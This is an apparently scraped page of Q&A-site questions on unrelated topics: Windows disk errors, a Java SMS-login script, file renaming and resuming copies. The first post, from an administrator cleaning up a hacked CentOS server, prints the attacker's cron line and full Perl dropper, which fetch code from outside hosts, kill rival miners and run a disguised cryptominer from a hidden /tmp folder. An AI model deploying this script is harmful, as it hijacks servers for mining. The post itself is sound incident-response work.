  • ./kernelupdates 100% cpu usage

    - by Vaibhav Panmand
    I have a CentOS 6 server running some WordPress and Tomcat websites. In the last two days it has been crashing continuously. After investigation, we found a kernelupdates binary consuming 100% CPU on the server. The process is:

        ./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx

    This is obviously not a valid kernel update; the server has probably been compromised and the process installed by an attacker. I've killed the process and removed the apache user's cron entries, but the process somehow started again a couple of hours later, and the cron entries were restored as well. I am searching for whatever is modifying the cron jobs. Does this process belong to a mining operation? How can we stop the cron-job modification and clean out the source of this process?

    Cron entry (apache user):

        */6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* abc.txt

    The abc.txt script it fetches:

        #!/usr/bin/perl
        system("killall -9 minerd");
        system("killall -9 PWNEDa");
        system("killall -9 PWNEDb");
        system("killall -9 PWNEDc");
        system("killall -9 PWNEDd");
        system("killall -9 PWNEDe");
        system("killall -9 PWNEDg");
        system("killall -9 PWNEDm");
        system("killall -9 minerd64");
        system("killall -9 minerd32");
        system("killall -9 named");
        $rn=1;
        $ar=`uname -m`;
        while($rn==1 || $rn==0) {
            $rn=int(rand(11));
        }
        $exists=`ls /tmp/.ice-unix`;
        $cratch=`ps aux | grep -v grep | grep kernelupdates`;
        if($cratch=~/kernelupdates/gi) { die; }
        if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) {
            $wig=`wget --version | grep GNU`;
            if(length($wig>6)) {
                if($ar=~/64/g) {
                    system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
                } else {
                    system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
                }
            } else {
                if($ar=~/64/g) {
                    system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
                } else {
                    system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
                }
            }
        }
        @prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382');
        $prt=0;
        while(length($prt)<4) {
            $prt=$prts[int(rand(19))-1];
        }
        print "setup for $rn:$prt done :-)\n";
        system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
        print "done!\n";

    Thanks in advance!
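    To find what keeps restoring the cron entry, a first sweep usually covers every place cron reads from plus any still-running parent process; a sketch using only standard commands:

        crontab -l -u apache                                # what's in the apache user's crontab right now
        ls -la /var/spool/cron /etc/cron.d /etc/cron.hourly # other cron drop-in locations
        ps auxww | grep -i -e kernelupdates -e abc.txt      # a respawning parent would show up here
        lsattr /var/spool/cron/apache                       # unusual attributes on the crontab file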

    Read the article

  • Windows 7 disk errors after a few hours of runtime

    - by GFK
    I'm having trouble understanding what is going on with my work PC. Whenever I boot it, it runs fine for a while, then starts to randomly show disk errors. The displayed error often contains the message "not enough storage is available to process this command", although it differs depending on which application fails. This has been happening for weeks now and is getting worse. This is what troubles me:

    It never seems to impact critical parts of the system (no BSOD, no freeze). Only some applications seem impacted, refusing to function correctly after a while: Outlook 2010 cannot download RSS feeds anymore, Firefox 6 and IE9 cannot download anything bigger than 3 MB without failing, Windows Update fails, all MSI installers fail, Visual Studio 2010 starts failing in weird ways... It only happens after a while of use (typically 3 hours, though installing a program or compiling several times seems to shorten that). Rebooting solves it (temporarily).

    The system: the OS is Windows 7 Pro Spanish SP1, 32-bit, on an HP Compaq 6000 Pro with 4 GB memory (only 3.4 GB usable since the system is 32-bit) and one 500 GB hard drive. Installed applications include Visual Studio 2010, SQL Server 2008 R2, VMware Workstation 7, Microsoft Security Essentials, and Office 2010. Shutting down all related services and processes doesn't seem to change anything.

    The diagnostics I've run so far:

    Hard drive: 465 GB, 165 GB free.

    Process Explorer: physical and virtual memory seem OK (pagefile is 5.3 GB, physical memory usage 70%, system commit 39%).

    Windows Memory Diagnostic tool: OK.

    CHKDSK returned (for non-Spanish speakers: that means all OK):

        488282111 KB total disk space.
        281668248 KB in 265779 files.
        150188 KB in 62949 indexes.
        0 KB in bad sectors.
        571755 KB in use by the system.
        The log file has occupied 65536 kilobytes.
        205891920 KB available on disk.

    SMART diagnostic tools (DiskCheckup) report all values normal. Temperatures are in the normal range (HWiNFO). The Event Viewer doesn't seem to contain any significant message. I also ran CCleaner 3, without any noticeable effect.

    I was thinking about some file-number limit (between Visual Studio projects and other applications, there are around 300,000 files on the hard drive), but I couldn't find any. It's possible there is something related to the use of the temporary folders (it's the only explanation I have for why applications fail but Windows doesn't), but I cannot confirm that. The only thing I cannot find out is whether chkdsk reporting 65 MB for the log is normal; it seems that since Vista it always reports this. Any other cleaning/diagnostic tool you might know of?

    Edit: I ran several other tools since I first published the question.

    Seagate SeaTools (the HD manufacturer's analysis tool): complete test run OK.

    Intel Rapid 10.1 (the HD controller manufacturer's troubleshooting tool): the HD's OK.

    Microsoft Desktop Heap Monitor:

        Desktop Heap Information Monitor Tool (Version 8.1.2925.0)
        Copyright (c) Microsoft Corporation. All rights reserved.
        Session ID: 1 Total Desktop: ( 46464 KB - 11 desktops)
        WinStation\Desktop                       Heap Size(KB)  Used Rate(%)
        WinSta0\Winlogon (s1)                    128            3.6
        WinSta0\Disconnect (s1)                  64             3.8
        WinSta0\Default (s1)                     20480          3.0
        msswindowstation\mssrestricteddesk (s0)  1024           0.2
        __X78B95_89_IW__A8D9S1_42_ID (s0)        1024           0.2
        Service-0x0-3e5$\Default (s0)            1024           0.6
        Service-0x0-3e4$\Default (s0)            1024           0.3
        Service-0x0-3e7$\Default (s0)            1024           2.1
        WinSta0\Winlogon (s0)                    128            1.9
        WinSta0\Disconnect (s0)                  64             3.8
        WinSta0\Default (s0)                     20480          0.0

    All OK; desktop heap usage is under 5%.

    Edit 2: I tried totally resetting my account by creating a new one, logging in under the new one, deleting the first one (local rights and files), then logging back in with the deleted account (it is a domain account). No luck. Also, I found that the error is often "not enough storage is available to process this command". Searching the internet, I found an old troubleshooting tip (setting a registry key to raise the IRP stack limit, whatever that is) which did not change anything.

    Read the article

  • Log in and send SMS with Java

    - by noobed
    I'm trying to log into a site and then send an SMS (the site lets you do this for free; it's nothing more than entering some text into some fields and submitting). I've used Wireshark to track some of the POST/GET requests my machine exchanges with the server when using the browser. Here is some of my Java code:

        URL url;
        String urlP = "maccount=myRawUserName7&" +
                "mpassword=myRawPassword&" +
                "redirect_http=http&" +
                "submit=........";
        String urlParameters = URLEncoder.encode(urlP, "CP1251");
        HttpURLConnection connection = null;
        // Create connection
        url = new URL("http://www.mtel.bg/1/mm/smscenter/mc/sendsms/ma/index/mo/1");
        connection = (HttpURLConnection) url.openConnection();
        connection.setRequestMethod("POST");
        // I'm not really sure if these RequestProperties are necessary,
        // so I'll leave them as a comment
        // connection.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
        // connection.setRequestProperty("Accept-Charset", "CP1251");
        // connection.setRequestProperty("Content-Length",
        //         "" + Integer.toString(urlParameters.getBytes().length));
        // connection.setRequestProperty("Content-Language", "en-US");
        connection.setUseCaches(false);
        connection.setDoInput(true);
        connection.setDoOutput(true);
        // Send request
        DataOutputStream wr = new DataOutputStream(connection.getOutputStream());
        wr.writeBytes(urlParameters);
        wr.flush();
        wr.close();
        String headerName[] = new String[10];
        int count = 0;
        for (int i = 1; (headerName[count] = connection.getHeaderFieldKey(i)) != null; i++) {
            if (headerName[count].equals("Set-Cookie")) {
                headerName[count++] = connection.getHeaderField(i);
            }
        }
        // I'm not sure if I have to close the connection here or not
        if (connection != null) {
            connection.disconnect();
        }
        // the code above should be the login part
        // -----------------------------------------
        // this is copy-pasted from wireshark's info.
        String smsParam = "from=men&" +
                "sender=0&" +
                "msisdn=359886737498&" +
                "tophone=0&" +
                "smstext=tova+e+proba%21+1.&" +
                "id=&" +
                "sendaction=&" +
                "direction=&" +
                "msgLen=84";
        url = new URL("http://www.mtel.bg/moyat-profil-sms-tsentar_3004/" +
                "mm/smscenter/mc/sendsms/ma/index");
        connection = (HttpURLConnection) url.openConnection();
        connection.setRequestMethod("POST");
        connection.setRequestProperty("Cookie", headerName[0]);
        connection.setRequestProperty("Cookie", headerName[1]);
        // conn
        // (note: this re-encodes urlP, the login string; smsParam built above is never sent)
        urlParameters = URLEncoder.encode(urlP, "CP1251");
        connection.setUseCaches(false);
        connection.setDoInput(true);
        connection.setDoOutput(true);
        wr = new DataOutputStream(connection.getOutputStream());
        wr.writeBytes(urlParameters);
        wr.flush();
        wr.close();
        // I'm not really sure what exactly to do with this response.
        // Get Response
        InputStream is = connection.getInputStream();
        BufferedReader rd = new BufferedReader(new InputStreamReader(is, "CP1251"));
        String line;
        StringBuffer response = new StringBuffer();
        while ((line = rd.readLine()) != null) {
            response.append(line);
            response.append('\r');
        }
        rd.close();
        System.out.println(response.toString());
        if (connection != null) {
            connection.disconnect();
        }

    So that's my code so far. When I execute it, I don't receive any text on my phone, so it clearly doesn't work as it's supposed to. I would appreciate any guidance or remarks. Is my cookie handling wrong? Is my login method wrong? Am I passing the right URLs? Am I encoding and sending the parameter string correctly? Is there any additional valuable data in these POSTs that I should use?

    P.S. Just in case, let me tell you that the username and password are not real; for security reasons I don't want to give valid ones (I think this is an appropriate approach). Here are the POST requests. The first one is what Wireshark's Follow TCP Stream shows when pressing the log-in button:

        POST /1/mm/auth/mc/auth/ma/index/mo/1 HTTP/1.1
        Host: www.mtel.bg
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: keep-alive
        Referer: http://www.mtel.bg/1/mm/smscenter/mc/sendsms/ma/index/mo/1
        Cookie: __utma=209782857.541729286.1349267381.1349270269.1349274374.3; __utmc=209782857; __utmz=209782857.1349267381.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=28%7C40; PHPSESSID=q0mage2usmv34slcv3dmd6t057; __utmb=209782857.3.10.1349274374
        Content-Type: multipart/form-data; boundary=---------------------------151901450223722
        Content-Length: 475

        -----------------------------151901450223722
        Content-Disposition: form-data; name="maccount"

        myRawUserName
        -----------------------------151901450223722
        Content-Disposition: form-data; name="mpassword"

        myRawPassword
        -----------------------------151901450223722
        Content-Disposition: form-data; name="redirect_https"

        http
        -----------------------------151901450223722
        Content-Disposition: form-data; name="submit"

        ........
        -----------------------------151901450223722--

        HTTP/1.1 302 Found
        Server: nginx
        Date: Wed, 03 Oct 2012 14:26:40 GMT
        Content-Type: text/html; charset=Utf-8
        Connection: close
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Pragma: no-cache
        Location: /moyat-profil-sms-tsentar_3004/mm/smscenter/mc/sendsms/ma/index
        Content-Length: 0

    And this one is captured when pressing the send button:

        POST /moyat-profil-sms-tsentar_3004/mm/smscenter/mc/sendsms/ma/index HTTP/1.1
        *same as the above ones*
        Referer: http://www.mtel.bg/moyat-profil-sms-tsentar_3004/mm/smscenter/mc/sendsms/ma/index
        Cookie: __utma=209782857.541729286.1349267381.1349270269.1349274374.3; __utmc=209782857; __utmz=209782857.1349267381.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=29%7C40; PHPSESSID=q0mage2usmv34slcv3dmd6t057; __utmb=209782857.4.10.1349274374
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 147

        from=men&sender=0&msisdn=35988888888&tophone=0&smstext=this+is+some+FREE+SMS+text%21+100+char+per+sms+only%21&id=&sendaction=&direction=&msgLen=50

        HTTP/1.1 302 Found
        Server: nginx
        Date: Wed, 03 Oct 2012 14:31:38 GMT
        Content-Type: text/html; charset=Utf-8
        Connection: close
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Pragma: no-cache
        Location: /moyat-profil-sms-tsentar_3004/mm/smscenter/mc/sendsms/ma/success/s/1
        Content-Length: 0

    Read the article

  • Tool to identify (and remove) unnecessary website files?

    - by xanadont
    Inevitably I'll stop using an antiquated CSS, script, or image file, especially when a separate designer is tinkering with things and testing out a few versions of images. Before I build one myself, are there any tools out there that will drill through a website and list unlinked files? Specifically, I'm interested in ASP.NET MVC sites, so detecting calls to (among many other things) @Url.Content(...) is important.

    Read the article

  • How to rename files with count

    - by nkint
    I have a directory like this:

        randomized_quad015.png
        randomized_quad030.png
        randomized_quad045.png
        randomized_quad060.png
        randomized_quad075.png
        randomized_quad090.png
        randomized_quad1005.png
        randomized_quad1020.png
        randomized_quad1035.png
        randomized_quad1050.png
        randomized_quad105.png
        randomized_quad1065.png
        randomized_quad1080.png
        randomized_quad1095.png
        randomized_quad1110.png
        randomized_quad1125.png
        randomized_quad1140.png

    and I want to rename the files with three-digit numbers by adding a 0 in front of the number (e.g. randomized_quad015.png becomes randomized_quad0015.png), but I don't know how. Some help?
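    A minimal bash sketch of the zero-padding idea, assuming every name matches randomized_quad<digits>.png; the echo makes it a dry run first — drop it to rename for real:

        # pad the numeric part to 4 digits (10# avoids octal parsing of leading zeros)
        for f in randomized_quad*.png; do
            n=${f#randomized_quad}; n=${n%.png}
            printf -v new 'randomized_quad%04d.png' "$((10#$n))"
            echo mv -- "$f" "$new"
        done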

    Read the article

  • How to pause/resume transfer of large files?

    - by Olivier Lalonde
    I recently had to copy about 20 GB of data, split between about 20 files, from my laptop to an external hard drive. Since this operation takes quite a while (at ~560 kB/s), I was wondering whether there is any way to pause the transfer and resume it later (in case I need to interrupt it). As a side question, is there any performance difference between copying from the terminal and copying from Nautilus?
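    One common approach is to do the copy with rsync instead of cp or Nautilus, since an interrupted run can simply be re-issued and picks up where it left off; a sketch with placeholder paths:

        # -a preserves attributes; --partial keeps half-copied files so a rerun resumes them
        rsync -a --partial --progress /path/to/source/ /media/external-drive/destination/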

    Read the article
